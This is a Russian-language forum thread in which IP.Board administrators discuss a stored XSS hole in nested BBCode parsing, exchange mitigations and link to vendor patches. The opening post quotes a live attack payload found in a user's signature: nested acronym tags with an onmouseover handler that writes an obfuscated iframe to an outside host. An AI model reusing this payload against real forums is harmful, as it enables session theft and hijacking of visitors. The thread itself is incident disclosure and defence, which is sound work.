Пытаются взломать что делать

[fagediba]

Есть форум ipb 2 3 6

 

один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код

 

[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]

 

 

вот как работает тег акронима:

[acronym='Laugh Out Loud']lol[/acronym]


<acronym title='{option}'>{content}</acronym>

 

Как защититься и что делать?

[Ritsuka]

Коды эксплоитов высланы на support@invisionpower.com и support@ibresource.ru.

[vasyast]

Школота счастлива новой глупой дырке.

[Ritsuka]

vasyast, ну, я, допустим, не школота, но на этом форуме есть активная XSS - это очень нехорошо и глупо это отрицать

[vasyast]

vasyast, ну, я, допустим, не школота, но на этом форуме есть активная XSS - это очень нехорошо и глупо это отрицать

А я и не отрицаю. Да, дырка. Ну что ж поделать.

[Ritsuka]

В общем, решение для тройки - отключите обработку вложенных тегов. Везде где только можно. Обязательно для email, url, font, member, topic, blog, post, acronym, background. Целее будете....

 

Надесь проснуться завтра и увидеть готовые патчи для 3.х и для 2.х

[rinich]

Где и как это сделать всё было бы здорово узнать, а то мы сейчас наотключаем тут =)))

[KoMePcAHT]

у меня на ни на 2,3,6 ни на 3,0,5 не работают эти скрипты... можете написать тут или в личку кинуть код красной таблички из первой страницы темы, хочу проверить у себя.

[Ritsuka]

rinich, в настройках каждого из BBCode есть опция - "Предотвращать разбор вложенных кодов". Савьте "Да". Только кэш не сбрасывайте, а то уже существующие посты на форуме попортятся

 

Так, сводный пост по всему, что мне известно.

 

- дыра известна давно, еще с прошлого года.

- дыра есть и в 2.х, и в 3.х и связана с обработкой вложенных кодов,

- дыра явно активно эксплуатировалась всякими темными личностями и на публику попала случайно,

- в 2.х из-за дыры есть активная XSS (используется в подписях), что грозит вам уводом cookies, сиречь, сессии,

- в 3.х из-за дыры пока удается только попортить разметку страницы, однако, некоторые хакеры пишут о так же рабочей XSS,

- в 2.х проблема, вероятно, решается отключением BBCode в подписях и удалением тега acronym,

- в 3.х следует запретить обработку вложенных тегов для email, url, font, member, topic, blog, post, acronym, background. Возможно, другие теги так же уязвимы - не проверял.

 

Все примеры кода, ссылки на хакерские форумы и примеры использования эксплоитов высланы саппортам IPS и IBR.

 

В целом ничего хорошего.

[Sannis]

Коды эксплоитов высланы на support@invisionpower.com и support@ibresource.ru.

Адреса support@ibresource.ru не существует. Если вы нашли этот адрес на одной из страниц клиентцентра, то это лишнее подтверждение того, что ИБР не в состоянии даже там привести всё к актуальному виду. Я говорил об этом ещё пар лет назад.

 

P.S. Напишите на sales@ibresource.ru, хотя уже всё равно.

[Ritsuka]

Хотя бы лупбэк тогда отправляли бы, что нет адреса Оо

 

В клиент-центр запощу коды.

 

Собственно, запостил... Вот только 2:17 8-го марта дают неутешительные прогнозы на исправление.

 

Собственно, вот результат порчи IP.Board 3, уже затертый с IPS админами:

 

IPS отписались что рассматривают проблему.

[XoTTa6bI4_]

cut Изменено 8 Марта 2010 пользователем XoTTa6bI4_

[carloscastaneda]

ОТКЛЮЧИТЕ ПОДПИСИ НА СВОИХ ФОРУМАХ ВТОРОЙ ЛИНЕЙКИ!

Прошу прощения за тупой вопрос, а это где точно?

[XoTTa6bI4_]

Дыра в парсере BBCode.

 

- сменить себе пароль и сбросить ключ авторизации через админцентр;

- удалить BBCode acronym;

- отписать об обнаруженной уязвимости форума в IPS;

- начать думать об обновлении до 3.х (хотя там парсер еще кривее).

 

Первый пункт имеет смысл если сделать это быстро. Иначе вашей сессией уже могли воспользоваться (проверьте логи авторизации в АЦ) и что-нибудь нехорошее сделать.

 

Самый оптимальный вариант. Тэгом acronym мало кто пользуется...

[carloscastaneda]

- удалить BBCode acronym;

Это все, что нужно сделать?

[fagediba]

- удалить BBCode acronym;

Это все, что нужно сделать?

 

это спасет от тега акроним, на античате, хоть там и вобла, нашел тему где один пользователь описал как он взломал античат с помощью использования вложенных тегов url, так что как говорится закрыть можно только текущий баг, но не все лазейки

[habahaba]

ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо

[Ritsuka]

Исправлено и для 2.3.6, и для 3.0.5. Патчи от IPS будут выложены сегодня.

[Ph-A]

ББ коды отключать не стал, просто прописал запрет на установку подписи тем, у кого нет 50 постов.

 

Отрубать бб коды - эт зло... Юзеры обидяццо

Я отрубил бб в подписе и в несколько тегах -- Использовать опции в теге? (Используется для создания BB-кода с опциями: [tag=option])

 

И все. Будут попытки вздома до патча, врублю все вновь, но отключу регистрацию на время.

 

Исправлено и для 2.3.6, и для 3.0.5. Патчи от IPS будут выложены сегодня.

Надо будет и здесь продублировать. А то ibresource выложить все с большой задержкой.

[TOIIOP]

А вот и патч!!! http://community.invisionpower.com/topic/3...p;#entry1922743

[Ritsuka]

Патчи:

 

236xss_march10.zip

 

305xss_march10.zip

[Arhar]

о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

[Ritsuka]

Обошел патч на 3.х (рабочую XSS не получил, но HTML снова разрушил). Снова отослал код. Что-то как-то экстенсивным путем идут ребята.... Изменено 8 Марта 2010 пользователем Ritsuka

[Arhar]

ну так вот, хочу посмотреть что я могу починить, нужна какая-нибудь цель, которую я буду чинить, а ты атаковать

[fagediba]

о, я там на даче сижу, а тут такое веселье)

только кажись эти придурки закрыли тег акроним

							# XSS acronym
						if ( $row['bbcode_tag'] == 'acronym' )
						{

а надо то наверно все опции проверять

плюс у них есть такая замечательная функция в ipsclass -- xss_html_clean

вот почему бы ей не того?

 

Ritsuka, мы можем где-нибудь поиграться? хочу потестить свои патчи

 

а вот в тройке все круто -

$_option	= $this->checkXss($_option, false, $_tag);

так и надо

 

а, нет, в двойке тоже есть оно

 

Я правильно понимаю что фиксанули только тег акроним , т.е. если он удален вообще то патч можно и не ставить? или там еще что-то?

[Ritsuka]

Поправили только style. А вот onmouseover в подписи кажется и не тронули оО

 

Arhar, у меня нигде нет двойки и быстро не поставить